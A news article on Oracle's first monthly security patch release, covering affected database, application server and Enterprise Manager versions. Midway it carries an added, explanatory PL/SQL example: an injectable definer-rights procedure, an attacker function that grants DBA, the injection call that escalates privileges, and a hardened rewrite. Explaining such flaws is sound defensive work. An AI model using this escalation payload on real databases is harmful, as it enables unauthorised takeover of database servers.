Oracle releases first security update in new monthly cycle

Bill Brenner

Oracle Corp. released fixes Tuesday for multiple security holes in Enterprise Manager, Database Server and Application Server. It was the first security update in the company's new monthly patching cycle.

"Providing customers with information and workarounds for security vulnerabilities is vital to protecting information systems," Oracle said in a statement Tuesday. "To that end, Oracle is informing customers that potential security vulnerabilities have been discovered in Oracle's Database and Application Server and Enterprise Manager products. Oracle recommends that customers apply patches for these potential vulnerabilities."

The Redwood Shores, Calif.-based company said the vulnerabilities affect:

  • Oracle Database 10g Release 1, version 10.1.0.2
  • Oracle9i Database Server Release 2, versions 9.2.0.4 and 9.2.0.5
  • Oracle9i Database Server Release 1, versions 9.0.1.4, 9.0.1.5 and 9.0.4
  • Oracle8i Database Server Release 3, version 8.1.7.4
  • Oracle Enterprise Manager Grid Control 10g, version 10.1.0.2
  • Oracle Enterprise Manager Database Control 10g, version 10.1.0.2
  • Oracle Application Server 10g (9.0.4), versions 9.0.4.0 and 9.0.4.1
  • Oracle9i Application Server Release 2, versions 9.0.2.3 and 9.0.3.1
  • Oracle9i Application Server Release 1, version 1.0.2.2

Oracle said of the vulnerabilities in the Database and Application servers, "The unpatched exposure risk is high; exploiting some of these vulnerabilities requires network access, but no valid user account." Of the Enterprise Manager vulnerabilities, the company said, "The unpatched exposure risk is medium; exploiting these vulnerabilities requires a valid operating system user account on the Enterprise Manager host."

Some patches "eliminate vulnerabilities in the Database Server and the Listener." Others plug holes "in the Portal and iSQL*Plus components of Oracle Application Server." The rest fix vulnerabilities in Enterprise Manager. The security bulletin does not describe the specific flaws or what an attacker could accomplish by exploiting them. But David Litchfield, a researcher at U.K.-based NGSSoftware, discussed the vulnerabilities his company discovered at length at July's Black Hat Briefings in Las Vegas. Generally, he said, the flaws involve PL/SQL (Procedural Language/Structured Query Language) and its triggers. One flaw allows an attacker to gain control of the database server without a user ID or password, while others could allow a low-privileged user to take over the database server.
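The PL/SQL flaw class Litchfield described, dynamic SQL assembled from caller input inside a stored procedure that runs with its owner's privileges rather than the caller's, is easiest to see in code. The following is a constructed example added here for illustration; it is not Oracle's code and not one of the patched vulnerabilities. The schema names APP_OWNER and ATTACKER, the CUSTOMERS table, the procedure and function names, and the privileges stated in the comments are all assumptions.

```sql
-- Constructed illustration (added here; not Oracle's code and not one of the
-- patched flaws). Schema names APP_OWNER and ATTACKER, table CUSTOMERS and the
-- procedure/function names are assumptions.

-- 1. Vulnerable pattern: a definer-rights procedure (the default when AUTHID
--    is omitted) that splices caller input into dynamic SQL by concatenation.
CREATE OR REPLACE PROCEDURE app_owner.lookup_customer (p_name IN VARCHAR2)
AS
  l_count PLS_INTEGER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app_owner.customers WHERE name = ''' || p_name || ''''
    INTO l_count;
  DBMS_OUTPUT.PUT_LINE('matches: ' || l_count);
END;
/
GRANT EXECUTE ON app_owner.lookup_customer TO PUBLIC;

-- 2. How a low-privileged user abuses it (assumption: ATTACKER has CREATE
--    PROCEDURE). The injected function is declared AUTHID CURRENT_USER, so when
--    the definer-rights procedure evaluates it the current user is APP_OWNER,
--    and the GRANT runs with APP_OWNER's directly granted privileges
--    (assumption: APP_OWNER holds GRANT ANY ROLE). The autonomous transaction
--    lets DDL execute from inside a SELECT.
CREATE OR REPLACE FUNCTION attacker.escalate RETURN VARCHAR2
AUTHID CURRENT_USER
AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO attacker';
  COMMIT;
  RETURN 'x';
END;
/
GRANT EXECUTE ON attacker.escalate TO PUBLIC;

-- The input closes the literal, calls the function and re-opens the literal,
-- so the built statement still parses:
--   SELECT COUNT(*) FROM app_owner.customers WHERE name = 'x' || attacker.escalate() || ''
-- (the predicate, and so the function, is evaluated against the table's rows).
EXEC app_owner.lookup_customer('x'' || attacker.escalate() || ''');

-- 3. Hardened: static SQL with the input bound as data (no string building),
--    and invoker's rights so the unit never lends the owner's privileges to
--    callers (callers then need their own SELECT on the table).
CREATE OR REPLACE PROCEDURE app_owner.lookup_customer (p_name IN VARCHAR2)
AUTHID CURRENT_USER
AS
  l_count PLS_INTEGER;
BEGIN
  SELECT COUNT(*) INTO l_count
    FROM app_owner.customers
   WHERE name = p_name;
  DBMS_OUTPUT.PUT_LINE('matches: ' || l_count);
END;
/
-- If dynamic SQL is unavoidable, bind instead of concatenating:
--   EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM app_owner.customers WHERE name = :n'
--     INTO l_count USING p_name;
```

Run each step as the schema owner named in it, in SQL*Plus. The defence is twofold: never build SQL from caller input by concatenation (use static SQL or bind variables), and do not expose definer-rights procedures to PUBLIC without reason, because the owner's privileges, not the caller's, are what an injected statement runs with. Note that bind variables stop the injection but do not by themselves fix the privilege exposure; the AUTHID clause addresses that.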

Oracle's bulletin added that "all Collaboration Suite customers should apply the Oracle Database patches to their Information Storage database and the Oracle Application Server-embedded database. Collaboration Suite customers should also apply the application server patch to the Oracle Application Server infrastructure installation and to each Collaboration Suite middle tier installation. Collaboration Suite customers that have upgraded their Information Storage database to version Oracle Database 10g Release 1, version 10.1.0.2 should also apply the Enterprise Manager patch."

Further, it said, "E-Business Suite Release 11i customers should apply the available Oracle Database patches to their current Oracle Database Servers, which should be one of the following: Oracle8i Database Server Release 3, version 8.1.7.4; Oracle9i Database Server Release 2, version 9.2.0.4; and Oracle9i Database Server Release 2, version 9.2.0.5. E-Business Suite Release 11i customers should also apply the Oracle Application Server patch to their current Oracle Application Server releases, which should be one of the following: Oracle9i Application Server Release 1, version 1.0.2.2; and Oracle Application Server 10g (9.0.4), version 9.0.4.0."

Oracle announced its decision to move to monthly security updates two weeks ago, after reports of 34 vulnerabilities in multiple versions of its database server, the majority of them critical, were widely circulated. An Oracle spokesperson had earlier acknowledged that Litchfield's disclosure of the flaws hastened the decision.
